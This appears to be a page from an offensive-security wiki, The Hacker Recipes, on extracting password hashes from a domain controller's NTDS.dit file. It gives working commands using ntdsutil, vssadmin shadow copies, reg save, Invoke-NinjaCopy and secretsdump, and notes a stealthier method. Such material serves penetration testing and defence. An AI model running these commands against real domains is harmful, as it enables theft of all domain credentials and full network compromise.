The Hacker Recipes
GitHubTwitterKo-fi (one-time support)Patreon (monthly support)
Search…
Introduction
Active Directory
Reconnaissance
Movement
Credentials
Dumping
SAM & LSA secrets
DPAPI secrets
NTDS secrets
LSASS secrets
DCSync
Group Policy Preferences
Network shares
Network protocols
Web browsers
In-memory secrets
🛠️ Cached Kerberos tickets
🛠️ Windows Credential Manager
🛠️ Local files
🛠️ Password managers
Cracking
Bruteforcing
Shuffling
Impersonation
MITM and coerced auths
NTLM
Kerberos
Access controls
Group policies
Built-in groups
Domain settings
🛠️ Trusts
Netlogon
Certificate Services (AD-CS)
Exchange services
Print Spooler Service
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ binary exploitation
Use-after-free
Buffer overflow
🛠️ mobile apps
Android
iOS
Powered By GitBook
NTDS secrets
MITRE ATT&CK™ Sub-technique T1003.003
NTDS (Windows NT Directory Services) is the directory services used by Microsoft Windows NT to locate, manage, and organize network resources. The NTDS.dit file is a database that stores the Active Directory data (including users, groups, security descriptors and password hashes). This file is stored on the domain controllers.
Once the secrets are extracted, they can be used for various attacks: credential spraying, stuffing, shuffling, cracking, pass-the-hash, overpass-the-hash or silver or golden tickets.

Exfiltration

Since the NTDS.dit is constantly used by AD processes such as the Kerberos KDC, it can't be copied like any other file. In order to exfiltrate it from a live domain controller and extract password hashes from it, many techniques can be used.
Just like with SAM & LSA secrets, the SYSTEM registry hive contains enough info to decrypt the NTDS.dit data. The hive file (\system32\config\system) can either be exfiltrated the same way the NTDS.dit file is, or it can be exported with reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save'.

AD maintenance (NTDSUtil)

NTDSUtil.exe is a diagnostic tool available as part of Active Directory. It has the ability to save a snapshot of the Active Directory data. Running the following command will copy the NTDS.dit database and the SYSTEM and SECURITY hives to C:\Windows\Temp.
1
ntdsutil "activate instance ntds" "ifm" "create full C:\Windows\Temp\NTDS" quit quit
Copied!
The following files can then be exported
  • C:\Windows\Temp\NTDS\Active Directory\ntds.dit
  • C:\Windows\Temp\NTDS\registry\SYSTEM

Volume Shadow Copy (VSSAdmin)

VSS (Volume Shadow Copy) is a Microsoft Windows technology, implemented as a service, that allows the creation of backup copies of files or volumes, even when they are in use. The following command will create the shadow copy and will print two values that will be used later: the ID and the Name of the shadow copy.
1
vssadmin create shadow /for=C:
Copied!
Once the VSS is created for the target drive, it is then possible to copy the target files from it.
1
copy $ShadowCopyName\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save
Copied!
Once the required files are exfiltrated, the shadow copy can be removed
1
vssadmin delete shadows /shadow=$ShadowCopyId
Copied!
This attack can be carried out with Impacket's secretsdump with the -use-vss option. Additionaly, the -exec-method option can be set to smbexec, wmiexec or mmcexec to specify on which remote command execution method to rely on for the process.

NTFS structure parsing

Invoke-NinjaCopy is a PowerShell script part of the PowerSploit suite able to "copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This technique is stealthier than the others.
1
Invoke-NinjaCopy.ps1 -Path "C:\Windows\NTDS\NTDS.dit" -LocalDestination "C:\Windows\Temp\ntds.dit.save"
Copied!

Secrets dump

Once the required files are exfiltrated, they can be parsed by tools like secretsdump (Python, part of Impacket) or gosecretsdump (Go, faster for big files).
1
secretsdump -ntds ntds.dit.save -system system.save LOCAL
2
gosecretsdump -ntds ntds.dit.save -system system.save
Copied!
Previous
DPAPI secrets
Next
LSASS secrets
Last modified 1mo ago
Copy link
Contents
Exfiltration
AD maintenance (NTDSUtil)
Volume Shadow Copy (VSSAdmin)
NTFS structure parsing
Secrets dump